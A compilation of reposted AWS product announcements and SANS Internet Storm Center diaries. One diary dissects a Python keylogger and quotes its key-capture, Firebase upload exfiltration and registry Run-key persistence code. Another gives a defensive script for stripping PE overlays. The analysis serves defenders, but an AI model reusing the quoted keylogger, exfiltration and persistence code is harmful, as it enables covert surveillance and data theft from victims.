Amazon S3 Express One Zone now supports AWS KMS with customer managed keys

This post was originally published on this site

Amazon S3 Express One Zone, a high-performance, single-Availability Zone (AZ) S3 storage class, now supports server-side encryption with AWS Key Management Service (KMS) keys (SSE-KMS). S3 Express One Zone already encrypts all objects stored in S3 directory buckets with Amazon S3 managed keys (SSE-S3) by default. Starting today, you can use AWS KMS customer managed keys to encrypt data at rest, with no impact on performance. This new encryption capability gives you an additional option to meet compliance and regulatory requirements when using S3 Express One Zone, which is designed to deliver consistent single-digit millisecond data access for your most frequently accessed data and latency-sensitive applications.

S3 directory buckets allow you to specify only one customer managed key per bucket for SSE-KMS encryption. Once the customer managed key is added, you cannot edit it to use a new key. On the other hand, with S3 general purpose buckets, you can use multiple KMS keys either by changing the default encryption configuration of the bucket or during S3 PUT requests. When using SSE-KMS with S3 Express One Zone, S3 Bucket Keys are always enabled. S3 Bucket Keys are free and reduce the number of requests to AWS KMS by up to 99%, optimizing both performance and costs.

Using SSE-KMS with Amazon S3 Express One Zone
To show you this new capability in action, I first create an S3 directory bucket in the Amazon S3 console, following the steps to create an S3 directory bucket and using apne1-az4 as the Availability Zone. In Base name, I enter s3express-kms; a suffix that includes the Availability Zone ID is automatically added to create the final name. Then, I select the checkbox to acknowledge that Data is stored in a single Availability Zone.

In the Default encryption section, I choose Server-side encryption with AWS Key Management Service keys (SSE-KMS). Under AWS KMS key, I can Choose from your AWS KMS keys, Enter AWS KMS key ARN, or Create a KMS key. For this example, I select an AWS KMS key that I previously created, and then choose Create bucket.

Now, any new object I upload to this S3 directory bucket will be automatically encrypted using my AWS KMS key.
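If you prefer to script this setup with the AWS SDK for Python (boto3), here is a minimal sketch. It assumes the directory bucket already exists and that the PutBucketEncryption API is used to set its default encryption; the bucket name, Region, and KMS key ARN are placeholders to adapt to your environment.

import boto3

# Placeholders: adjust the bucket name, Region, and KMS key ARN to your setup.
BUCKET = "s3express-kms--apne1-az4--x-s3"
KMS_KEY_ARN = "arn:aws:kms:ap-northeast-1:<accountId>:key/<keyId>"

s3 = boto3.client("s3", region_name="ap-northeast-1")

# Set the directory bucket's default encryption to SSE-KMS with the customer
# managed key. S3 Bucket Keys are always used with SSE-KMS on S3 Express One Zone.
s3.put_bucket_encryption(
    Bucket=BUCKET,
    ServerSideEncryptionConfiguration={
        "Rules": [
            {
                "ApplyServerSideEncryptionByDefault": {
                    "SSEAlgorithm": "aws:kms",
                    "KMSMasterKeyID": KMS_KEY_ARN,
                },
                "BucketKeyEnabled": True,
            }
        ]
    },
)

# New uploads are now encrypted with the KMS key automatically.
s3.put_object(Bucket=BUCKET, Key="confidential-doc.txt", Body=b"example content")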

SSE-KMS with Amazon S3 Express One Zone in action
To use SSE-KMS with S3 Express One Zone via the AWS Command Line Interface (AWS CLI), you need an AWS Identity and Access Management (IAM) user or role with the following policy. This policy allows the CreateSession API operation, which is necessary to successfully upload and download encrypted files to and from your S3 directory bucket.

{
	"Version": "2012-10-17",
	"Statement": [
		{
			"Effect": "Allow",
			"Action": [
				"s3express:CreateSession"
			],
			"Resource": [
				"arn:aws:s3express:*:<account>:bucket/s3express-kms--apne1-az4--x-s3"
			]
		},
		{
			"Effect": "Allow",
			"Action": [
				"kms:Decrypt",
				"kms:GenerateDataKey"
			],
			"Resource": [
				"arn:aws:kms:*:<account>:key/<keyId>"
			]
		}
	]
}

With the PutObject command, I upload a new file named confidential-doc.txt to my S3 directory bucket.

aws s3api put-object --bucket s3express-kms--apne1-az4--x-s3 \
--key confidential-doc.txt \
--body confidential-doc.txt

When the previous command succeeds, I receive the following output:

{
    "ETag": ""664469eeb92c4218bbdcf92ca559d03b"",
    "ChecksumCRC32": "0duteA==",
    "ServerSideEncryption": "aws:kms",
    "SSEKMSKeyId": "arn:aws:kms:ap-northeast-1:<accountId>:key/<keyId>",
    "BucketKeyEnabled": true
}

Checking the object’s properties with the HeadObject command, I see that it’s encrypted using SSE-KMS with the key that I created before:

aws s3api head-object --bucket s3express-kms--apne1-az4--x-s3 \
--key confidential-doc.txt

I get the following output:

{
    "AcceptRanges": "bytes",
    "LastModified": "2024-08-21T15:29:22+00:00",
    "ContentLength": 5,
    "ETag": ""664469eeb92c4218bbdcf92ca559d03b"",
    "ContentType": "binary/octet-stream",
    "ServerSideEncryption": "aws:kms",
    "Metadata": {},
    "SSEKMSKeyId": "arn:aws:kms:ap-northeast-1:<accountId>:key/<keyId>",
    "BucketKeyEnabled": true,
    "StorageClass": "EXPRESS_ONEZONE"
}

I download the encrypted object with GetObject:

aws s3api get-object --bucket s3express-kms--apne1-az4--x-s3 \
--key confidential-doc.txt output-confidential-doc.txt

As my session has the necessary permissions, the object is downloaded and decrypted automatically.

{
    "AcceptRanges": "bytes",
    "LastModified": "2024-08-21T15:29:22+00:00",
    "ContentLength": 5,
    "ETag": ""664469eeb92c4218bbdcf92ca559d03b"",
    "ContentType": "binary/octet-stream",
    "ServerSideEncryption": "aws:kms",
    "Metadata": {},
    "SSEKMSKeyId": "arn:aws:kms:ap-northeast-1:<accountId>:key/<keyId>",
    "BucketKeyEnabled": true,
    "StorageClass": "EXPRESS_ONEZONE"
}

For this second test, I use a different IAM user with a policy that is not granted the necessary KMS key permissions to download the object. This attempt fails with an AccessDenied error, demonstrating that the SSE-KMS encryption is functioning as intended.

An error occurred (AccessDenied) when calling the CreateSession operation: Access Denied

This demonstration shows how SSE-KMS works seamlessly with S3 Express One Zone, providing an additional layer of security while maintaining ease of use for authorized users.

Things to know
Getting started – You can enable SSE-KMS for S3 Express One Zone using the Amazon S3 console, AWS CLI, or AWS SDKs. Set the default encryption configuration of your S3 directory bucket to SSE-KMS and specify your AWS KMS key. Remember, you can only use one customer managed key per S3 directory bucket for its lifetime.

Regions – S3 Express One Zone support for SSE-KMS using customer managed keys is available in all AWS Regions where S3 Express One Zone is currently available.

Performance – Using SSE-KMS with S3 Express One Zone does not impact request latency. You’ll continue to experience the same single-digit millisecond data access.

Pricing – You pay AWS KMS charges to generate and retrieve data keys used for encryption and decryption. Visit the AWS KMS pricing page for more details. In addition, when using SSE-KMS with S3 Express One Zone, S3 Bucket Keys are enabled by default for all data plane operations except for CopyObject and UploadPartCopy, and can’t be disabled. This reduces the number of requests to AWS KMS by up to 99%, optimizing both performance and costs.

AWS CloudTrail integration – You can audit SSE-KMS actions on S3 Express One Zone objects using AWS CloudTrail. Learn more about that in my previous blog post.

– Eli.

23:59, Time to Exfiltrate!, (Tue, Sep 17th)

This post was originally published on this site

Last week, I posted a diary about suspicious Python modules. One of them was Firebase [1], the cloud service provided by Google [2]. Abuse of Firebase services by attackers is not new; usually, it's used to host malicious files that will be available for download [3]. This is a nice location because who will think that a Google link is malicious?

Today, while reviewing my hunting results, I found an interesting Python script (again!) that relies on Firebase, but this time to exfiltrate data. Unfortunately, the file was stand-alone and I missed the JSON file containing the credentials to connect to the Firebase account. The file "iLoveYou.py" has a low score on VT (2/65) (SHA256:ec88244d7b037306bdb53d60f2a709af13ca74d15937d9901c8cd90bc00720f6) [4].

The file is a classic keylogger, very easy to implement in Python using pynput [5]:

from pynput.keyboard import Key, Listener
...
with Listener(on_press=tus_basildi) as listener:
    listener.join()

Every key press will generate a call to the function tus_basildi(). Note: the variable names are based on Turkish words.

This keylogger has been implemented in a “funny” way: key presses are logged and stored in a temporary file, but the file will only be exfiltrated daily at 23:59:

current_time = time.strftime("%H:%M")
if current_time == "23.59":
    if sayac == 0:
        blob = bucket.blob(bulut_path)
        blob.upload_from_filename(yerel_dosya)
        sayac = 1

Another funny fact: the script is buggy! Once the file has been exfiltrated at 23:59, the variable ‘sayac’ will be set to 1 but never reset. If the script runs for over 24 hours, it will never exfiltrate the file again. Maybe the attacker expects the victim to log in every day?

Persistence is implemented classically via a Run key:

def reg_olustur(nereye_koyucam, adi_ne_bunun, ne_yapicak_bu_sey):
    elektar = winreg.OpenKey(winreg.HKEY_CURRENT_USER, nereye_koyucam, 0, winreg.KEY_WRITE)
    winreg.SetValueEx(elektar, adi_ne_bunun, 0, winreg.REG_SZ, ne_yapicak_bu_sey)
    winreg.CloseKey(elektar)

nereye_koycam = "SoftwareMicrosoftWindowsCurrentVersionRun"
adi_ne_bunun = bilgisayar_adi
ne_yapicak_bu_sey = f"C:\Windows\System32\Tasks\iloveyou.exe"
reg_olustur(nereye_koycam, adi_ne_bunun, ne_yapicak_bu_sey)

Since an executable will be launched at login time, this Python script will probably be compiled into an executable. It should copy itself into the Tasks directory:

kaynak_dosya = 'iloveyou.exe'
hedef_dizin = 'C:\Windows\System32\Tasks'
shutil.copy(kaynak_dosya, hedef_dizin)

I tried to find the executable, without luck! But I found a previous version of the script, created a few days before (SHA256:43a4d56c11a12de13b8d2186daf5b00d793076fb47afcee5ecd0b327a634e150).

[1] https://pypi.org/project/firebase/
[2] https://firebase.google.com/solutions
[3] https://isc.sans.edu/diary/Recent+IcedID+Bokbot+activity/29740
[4] https://www.virustotal.com/gui/file/ec88244d7b037306bdb53d60f2a709af13ca74d15937d9901c8cd90bc00720f6
[5] https://pypi.org/project/pynput/

Xavier Mertens (@xme)
Xameco
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

AWS Weekly Roundup: Oracle Database@AWS, Amazon RDS, AWS PrivateLink, Amazon MSK, Amazon EventBridge, Amazon SageMaker and more

This post was originally published on this site

Hello, everyone!

It’s been an interesting week full of AWS news as usual, but also full of vibrant faces filling up the rooms in a variety of events happening this month.

Let’s start by covering some of the releases that have caught my attention this week.

My Top 3 AWS news of the week

Amazon RDS for MySQL zero-ETL integration with Amazon Redshift is now generally available, and it comes with exciting new features. You are now able to configure zero-ETL integrations in your AWS CloudFormation templates, and you also now have the ability to set up multiple integrations from a source Amazon RDS for MySQL database with up to five Amazon Redshift warehouses. Lastly, you can now also apply data filters that determine which databases and tables get automatically replicated. Read this blog post, where I review aspects of this release and show you how to get started with data filtering, if you want to know more. Incidentally, this release pairs well with another release this week: Amazon Redshift now allows you to alter the sort keys of tables replicated via zero-ETL integrations.

Oracle Database@AWS has been announced as part of a strategic partnership between Amazon Web Services (AWS) and Oracle. This offering allows customers to access Oracle Autonomous Database and Oracle Exadata Database Service directly within AWS, simplifying cloud migration for enterprise workloads. Key features include zero-ETL integration between Oracle and AWS services for real-time data analysis, enhanced security, and optimized performance for hybrid cloud environments. This collaboration addresses the growing demand for multi-cloud flexibility and efficiency. It will be available in preview later in the year, with broader availability in 2025 as it expands to new Regions.

Amazon OpenSearch Service now supports version 2.15, featuring improvements in search performance, query optimization, and AI-powered application capabilities. Key updates include radial search for vector space queries, optimizations for neural sparse and hybrid search, and the ability to enable vector and hybrid search on existing indexes. Additionally, it also introduces new features like a toxicity detection guardrail and an ML inference processor for enriching ingest pipelines. Read this guide to see how you can upgrade your Amazon OpenSearch Service domain.

So simple yet so good
These releases are simple in nature, but have a big impact.

AWS Resource Access Manager (RAM) now supports AWS PrivateLink – With this release, you can now securely share resources across AWS accounts with private connectivity, without exposing traffic to the public internet. This integration allows for more secure and streamlined access to shared services via VPC endpoints, improving network security and simplifying resource sharing across organizations.

AWS Network Firewall now supports AWS PrivateLink – Another security quick win: you can now securely access and manage Network Firewall resources without exposing traffic to the public internet.

AWS IAM Identity Center now enables users to customize their experience – You can set the language and visual mode preferences, including dark mode for improved readability and reduced eye strain. This update supports 12 different languages and enables users to adjust their settings for a more personalized experience when accessing AWS resources through the portal.

Others
Amazon EventBridge Pipes now supports customer managed KMS keys – Amazon EventBridge Pipes now supports customer-managed keys for server-side encryption. This update allows customers to use their own AWS Key Management Service (KMS) keys to encrypt data when transferring between sources and targets, offering more control and security over sensitive event data. The feature enhances security for point-to-point integrations without the need for custom integration code. See instructions on how to configure this in the updated documentation.

AWS Glue Data Catalog now supports enhanced storage optimization for Apache Iceberg tables – This includes automatic removal of unnecessary data files, orphan file management, and snapshot retention. These optimizations help reduce storage costs and improve query performance by continuously monitoring and compacting tables, making it easier to manage large-scale datasets stored in Amazon S3. See this Big Data blog post for a deep dive into this new feature.

Amazon MSK Replicator now supports the replication of Kafka topics across clusters while preserving identical topic names – This simplifies cross-cluster replication processes, allowing users to replicate data across Regions without needing to reconfigure client applications. This reduces setup complexity and enhances support for more seamless failovers in multi-cluster streaming architectures. See this Amazon MSK Replicator developer guide to learn more about it.

Amazon SageMaker introduces sticky session routing for inference – This allows requests from the same client to be directed to the same model instance for the duration of a session, improving consistency and reducing latency, particularly in real-time inference scenarios like chatbots or recommendation systems, where session-based interactions are crucial. Read about how to configure it in this documentation guide.

Events
The AWS GenAI Lofts continue to pop up around the world! This week, developers in San Francisco had the opportunity to attend two very exciting events at the AWS GenAI Loft in San Francisco, including the “Generative AI on AWS” meetup last Tuesday, featuring discussions about extended reality, future AI tools, and more. Then things got playful on Thursday with the demonstration of an Amazon Bedrock-powered Minecraft bot and AI video game battles! If you’re around San Francisco before October 19th, make sure to check out the schedule to see the list of events that you can join.

AWS GenAI Loft San Francisco talk

Make sure to check out the AWS GenAI Loft in São Paulo, Brazil, which opened recently, and the AWS GenAI Loft in London, which opens September 30th. You can already start registering for events before they fill up, including one called “The future of development” that offers a whole day of targeted learning for developers to help them accelerate their skills.

Our AWS communities have also been very busy throwing incredible events! I was privileged to be a speaker at AWS Community Day Belfast, where I finally got to meet all of the organizers of this amazing, thriving community in Northern Ireland. If you haven’t been to a community day, I really recommend you check them out! You are sure to leave energized by the dedication and passion of community leaders like Matt Coulter, Kristi Perreault, Matthew Wilson, Chloe McAteer, and their community members – not to mention the smiles all around. 🙂

AWS Community Belfast organizers and codingmatheus

Certifications
If you’ve been postponing taking an AWS certification exam, now is the perfect time! Register for free for the AWS Certified: Associate Challenge before December 12, 2024, and get a 50% discount voucher to take any of the following exams: AWS Certified Solutions Architect – Associate, AWS Certified Developer – Associate, AWS Certified SysOps Administrator – Associate, or AWS Certified Data Engineer – Associate. My colleague Jenna Seybold has posted a collection of study material for each exam; check it out if you’re interested.

Also, don’t forget that the brand new AWS Certified AI Practitioner exam is now available. It is in beta stage, but you can already take it. If you pass it before February 15, 2025, you get an Early Adopter badge to add to your collection.

Conclusion
I hope you enjoyed the news this week!

Keep learning!

Managing PE Files With Overlays, (Mon, Sep 16th)

This post was originally published on this site

There is a common technique used by attackers: they append some data at the end of files (this is called an overlay). This can be done for two main reasons. The first is to hide the appended data from the operating system (steganography). For example, you can append a text file at the end of a JPEG image. When your favourite image viewer processes the picture, it will just ignore the "rogue" data. Here is a PNG picture that has a text file (dir output) added at the end:

The second reason is to defeat security controls and tools by creating a very big file. For performance reasons, many tools won't scan or inspect big files. So attackers will append data to increase the file size. Usually, the data is just a series of zeroes because the compression ratio is excellent. Here is a recent example of a file that I discovered:

remnux@remnux:/MalwareZoo/20240910$ file 'Payment Confirmation.tgz'
Payment Confirmation.tgz: gzip compressed data, last modified: Tue Sep 10 06:05:16 2024, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 750001664 gzip compressed data, unknown method, ASCII, extra field, has comment, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 750001664
remnux@remnux:/MalwareZoo/20240910$ ls -l 'Payment Confirmation.tgz'
-rwx------ 1 remnux remnux 1167212 Sep 10 03:11 'Payment Confirmation.tgz'

The file is 1.1MB in size but it contains a pretty big executable (less common):

remnux@remnux:/MalwareZoo/20240910$ tar tzvf 'Payment Confirmation.tgz'
-rwxr-xr-x 0/0       750000000 2024-09-10 02:04 Payment Confirmation.exe

If you unpack and inspect the file manually, you'll see that it does indeed contain a huge amount of NULL bytes:

remnux@remnux:/MalwareZoo/20240910$ xxd 'Payment Confirmation.exe'
...
00093fa0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00093fb0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00093fc0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00093fd0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00093fe0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00093ff0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00094000: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00094010: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00094020: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00094030: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00094040: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00094050: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00094060: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00094070: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00094080: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00094090: 0000 0000 0000 0000 0000 0000 0000 0000  ................
000940a0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
000940b0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
000940c0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
000940d0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
000940e0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
000940f0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00094100: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00094110: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00094120: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00094130: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00094140: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00094150: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00094160: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00094170: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00094180: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00094190: 0000 0000 0000 0000 0000 0000 0000 0000  ................
000941a0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
000941b0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
000941c0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
000941d0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
000941e0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
000941f0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00094200: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00094210: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00094220: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00094230: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00094240: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00094250: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00094260: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00094270: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00094280: 0000 0000 0000 0000 0000 0000 0000 0000  ................

From a Windows loader point of view, this is not an issue: it will just ignore all the bytes that are not needed to execute the process. Thank you, Microsoft!

How can you analyze the PE file without being annoyed by the overlay? Just remove it! While you could try to manipulate the file with your favourite hex editor, there is an easy way to perform this task in a few lines of Python. A classic PE file looks like this (in a very simplified way!):

In the PE headers, you can find a list of all the sections present in the file with two parameters:

  • The section offset (PointerToRawData)
  • The section size (SizeOfRawData)

It's easy to get the overlay offset: PointerToRawData + SizeOfRawData. This value should be the end of the file. If the file size on disk is bigger, we have an overlay!

Python has a great module called pefile[1] that helps to investigate executables. I wrote a small script to remove an overlay from a PE file:

#!/usr/bin/python3
#
# Detects if a PE file has an overlay.
# If yes, it creates a new PE file without the extra data.
#
import os
import sys
import pefile

def detect_overlay(pe_filename):
    '''
    Detects and removes overlay from a PE file
    '''
    try:
        pe = pefile.PE(pe_filename)
    except Exception as e: 
        print(f"Can't open the PE file: {e}")
        return

    # Display sections
    print(f"{'Section Name':<15} {'Virtual Size':<15} {'Raw Size':<15} {'Raw Offset':<15}")
    print("="*58)
    for s in pe.sections:
        s_name = s.Name.decode('utf-8').rstrip('\x00')
        virtual_size = s.Misc_VirtualSize
        raw_size = s.SizeOfRawData
        raw_offset = s.PointerToRawData
        print(f"{s_name:<15} {virtual_size:<15} {raw_size:<15} {raw_offset:<15}")

    # The offset at which the PE sections end
    last_section = pe.sections[-1]
    end_of_pe = last_section.PointerToRawData + last_section.SizeOfRawData

    # The actual file size
    file_size = os.path.getsize(pe_filename)

    if file_size > end_of_pe:
        overlay_size = file_size - end_of_pe
        print(f"Overlay detected: {overlay_size} bytes")
        try:
            with open(pe_filename, 'rb') as infile:
                data = infile.read(end_of_pe)
        except Exception as e:
            print(f"Can't open {pe_filename}: {e}")
            return

        name, ext = os.path.splitext(pe_filename)
        new_pe_filename = f"{name}-clean{ext}"
        try:
            with open(new_pe_filename, 'wb') as outfile:
                outfile.write(data)
        except Exception as e:
            print(f"Can't write {new_pe_filename}: {e}")
            return
        new_file_size = os.path.getsize(new_pe_filename)
        print(f"New PE dumped: {new_pe_filename} (Size: {new_file_size})")
    else:
        print("No overlay detected")

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print("Usage: python3 overlay.py <pefilename>")
        sys.exit(1)

    detect_overlay(sys.argv[1])

Let's process our big PE file:

remnux@remnux:/MalwareZoo/20240910$ python3 overlay.py Payment-Confirmation.exe
Section Name    Virtual Size    Raw Size        Raw Offset     
==========================================================
.text           587568          587776          512            
.rsrc           1580            2048            588288         
.reloc          12              512             590336         
Overlay detected: 749409152 bytes
New PE dumped: Payment-Confirmation-clean.exe (Size: 590848)

Now, you can investigate the new sample as usual…

Be careful with overlays! Most of the time, they are just NULL bytes, but they may contain useful data that will be used by the malware at execution time (configuration, shellcode, …).
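If you would rather keep the overlay for further analysis instead of discarding it, pefile can locate it for you directly. Here is a minimal sketch (the output file name is arbitrary) that dumps the appended bytes to a separate file:

#!/usr/bin/python3
# Dump the overlay of a PE file to a separate file for later analysis.
import sys
import pefile

pe_filename = sys.argv[1]
pe = pefile.PE(pe_filename)

# pefile computes where the PE data ends; anything after that offset is the overlay.
overlay_offset = pe.get_overlay_data_start_offset()
if overlay_offset is None:
    print("No overlay detected")
    sys.exit(0)

overlay = pe.get_overlay()
print(f"Overlay of {len(overlay)} bytes starting at offset {overlay_offset}")

with open(pe_filename + ".overlay", "wb") as outfile:
    outfile.write(overlay)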

The PE file was another XWorm… 

[1] https://pypi.org/project/pefile/

Xavier Mertens (@xme)
Xameco
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

YARA-X's Dump Command, (Sun, Sep 15th)

This post was originally published on this site

YARA-X is not just a rewrite of YARA in Rust; it comes with new features too.

One of these features is the dump command: yr.exe dump …

YARA-X can parse several file formats natively, to support file-format specific YARA rules. These parsers can also be invoked explicitly (without YARA rules), for testing. The default output is YAML, and JSON output is supported too.

Didier Stevens
Senior handler
blog.DidierStevens.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Finding Honeypot Data Clusters Using DBSCAN: Part 2, (Fri, Aug 23rd)

This post was originally published on this site

In an earlier diary [1], I reviewed how using tools like DBSCAN [2] can be useful to group similar data. I used DBSCAN to try and group similar commands submitted to Cowrie [3] and URL paths submitted to the DShield web honeypot [4]. DBSCAN was very helpful to group similar commands, but it was also very useful when trying to determine whether commands from one honeypot were seen in another. How much overlap in attack data is there between honeypots? Is there any targeting based on the hosting location of the honeypot?
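If you want to experiment with the same idea, here is a minimal sketch of the grouping step using scikit-learn; the sample commands and the eps/min_samples values are illustrative only, not the exact data or parameters used for the diaries:

# Minimal sketch: cluster similar honeypot commands with DBSCAN.
# Vectorize each command with character n-grams, then cluster on cosine distance.
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.cluster import DBSCAN

commands = [
    "cat /proc/cpuinfo",
    "cat /proc/cpuinfo | grep name",
    "uname -a",
    "uname -s -m",
    "rm -rf /tmp/secure.sh /tmp/auth.sh",
]

# Character n-grams tolerate small variations between otherwise similar commands.
vectorizer = TfidfVectorizer(analyzer="char_wb", ngram_range=(3, 5))
X = vectorizer.fit_transform(commands)

# eps and min_samples are illustrative; tune them for your own data.
labels = DBSCAN(eps=0.5, min_samples=2, metric="cosine").fit_predict(X)

for label, command in zip(labels, commands):
    print(label, command)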

Amazon RDS for MySQL zero-ETL integration with Amazon Redshift, now generally available, enables near real-time analytics

This post was originally published on this site

Zero-ETL integrations help unify your data across applications and data sources for holistic insights and break down data silos. They provide a fully managed, no-code, near real-time solution for making petabytes of transactional data available in Amazon Redshift within seconds of data being written into Amazon Relational Database Service (Amazon RDS) for MySQL. This eliminates the need to create your own ETL jobs, simplifying data ingestion, reducing your operational overhead, and potentially lowering your overall data processing costs. Last year, we announced the general availability of zero-ETL integration with Amazon Redshift for Amazon Aurora MySQL-Compatible Edition as well as the availability in preview of Aurora PostgreSQL-Compatible Edition, Amazon DynamoDB, and RDS for MySQL.

I am happy to announce that Amazon RDS for MySQL zero-ETL integration with Amazon Redshift is now generally available. This release also includes new features such as data filtering, support for multiple integrations, and the ability to configure zero-ETL integrations in your AWS CloudFormation templates.

In this post, I’ll show how you can get started with data filtering and consolidating your data across multiple databases and data warehouses. For a step-by-step walkthrough on how to set up zero-ETL integrations, see this blog post for a description of how to set one up for Aurora MySQL-Compatible, which offers a very similar experience.

Data filtering
Most companies, no matter the size, can benefit from adding filtering to their ETL jobs. A typical use case is to reduce data processing and storage costs by selecting only the subset of data needed to replicate from their production databases. Another is to exclude personally identifiable information (PII) from a report’s dataset. For example, a business in healthcare might want to exclude sensitive patient information when replicating data to build aggregate reports analyzing recent patient cases. Similarly, an e-commerce store may want to make customer spending patterns available to their marketing department, but exclude any identifying information. Conversely, there are certain cases when you might not want to use filtering, such as when making data available to fraud detection teams that need all the data in near real time to make inferences. These are just a few examples, so I encourage you to experiment and discover different use cases that might apply to your organization.

There are two ways to enable filtering in your zero-ETL integrations: when you first create the integration or by modifying an existing integration. Either way, you will find this option on the “Source” step of the zero-ETL creation wizard.

Interface for adding data filtering expressions to include or exclude databases or tables.

You apply filters by entering filter expressions that can be used to either include or exclude databases or tables from the dataset in the format of database*.table*. You can add multiple expressions and they will be evaluated in order from left to right.

If you’re modifying an existing integration, the new filtering rules will apply from that point forward once you confirm your changes, and Amazon Redshift will drop tables that are no longer part of the filter.

If you want to dive deeper, I recommend you read this blog post, which goes in depth into how you can set up data filters for Amazon Aurora zero-ETL integrations since the steps and concepts are very similar.

Create multiple zero-ETL integrations from a single database
You are now also able to configure integrations from a single RDS for MySQL database to up to five Amazon Redshift data warehouses. The only requirement is that you must wait for the first integration to finish setting up successfully before adding others.

This allows you to share transactional data with different teams while providing them ownership over their own data warehouses for their specific use cases. For example, you can also use this in conjunction with data filtering to fan out different sets of data to development, staging, and production Amazon Redshift clusters from the same Amazon RDS production database.

Another interesting scenario where this could be really useful is consolidation of Amazon Redshift clusters by using zero-ETL to replicate to different warehouses. You could also use Amazon Redshift materialized views to explore your data, power your Amazon QuickSight dashboards, share data, run training jobs in Amazon SageMaker, and more.

Conclusion
RDS for MySQL zero-ETL integrations with Amazon Redshift allows you to replicate data for near real-time analytics without needing to build and manage complex data pipelines. It is generally available today with the ability to add filter expressions to include or exclude databases and tables from the replicated data sets. You can now also set up multiple integrations from the same source RDS for MySQL database to different Amazon Redshift warehouses or create integrations from different sources to consolidate data into one data warehouse.

This zero-ETL integration is available for RDS for MySQL versions 8.0.32 and later, Amazon Redshift Serverless, and Amazon Redshift RA3 instance types in supported AWS Regions.

In addition to using the AWS Management Console, you can also set up a zero-ETL integration via the AWS Command Line Interface (AWS CLI) and by using an AWS SDK such as boto3, the official AWS SDK for Python.
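As a rough illustration of the SDK route, here is a minimal boto3 sketch using the RDS CreateIntegration API. The ARNs are placeholders, and the DataFilter string is only an example of the include/exclude idea described above; check the zero-ETL documentation for the exact expression syntax.

import boto3

rds = boto3.client("rds", region_name="us-east-1")

# Placeholders: replace with your RDS for MySQL database ARN and your
# Amazon Redshift (Serverless namespace or RA3 cluster) ARN.
source_arn = "arn:aws:rds:us-east-1:<accountId>:db:my-rds-mysql-db"
target_arn = "arn:aws:redshift-serverless:us-east-1:<accountId>:namespace/<namespaceId>"

# The DataFilter string is illustrative only; filter expressions include or
# exclude databases/tables and are evaluated left to right.
response = rds.create_integration(
    IntegrationName="rds-mysql-to-redshift",
    SourceArn=source_arn,
    TargetArn=target_arn,
    DataFilter="include: mydb.orders*, exclude: mydb.orders_archive",
)
print(response)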

See the documentation to learn more about working with zero-ETL integrations.

Matheus Guimaraes

Hygiene, Hygiene, Hygiene! [Guest Diary], (Wed, Sep 11th)

This post was originally published on this site

[This is a Guest Diary by Paul Olson, an ISC intern as part of the SANS.edu BACS program]

Introduction

Starting my internship with the SANS Internet Storm Center [1] was daunting because I was unsure of what to expect. Over the years I’ve completed several SANS courses and have become comfortable with that experience; there is a flow to the courses, and the SANS instructors exceed my expectations. In this respect, the ISC Internship is a completely different animal; it presents a more hands-on learning opportunity, requires more self-reliance, and provides a greater element of unpredictability than I have found in SANS course labs. With more of the Internship work behind me than in front of me, I can say that I have gotten more out of this internship than I have from other similar experiences.

Some of my concerns were about the ‘unknown unknowns’ [2]. Setting up the DShield honeypot [3] was a straightforward exercise; my biggest worry was meeting the objectives of the Internship. Over the years that I have had broadband Internet, I have periodically reviewed the logs generated by my home firewall. The firewall logs didn’t provide a wealth of information (event time, source and destination IP, protocol and ports involved, etc.). My concern became “How am I going to produce seven attack observation reports out of this? Who is going to bother with this device connected in a basement to a broadband network in North Dakota, US?”

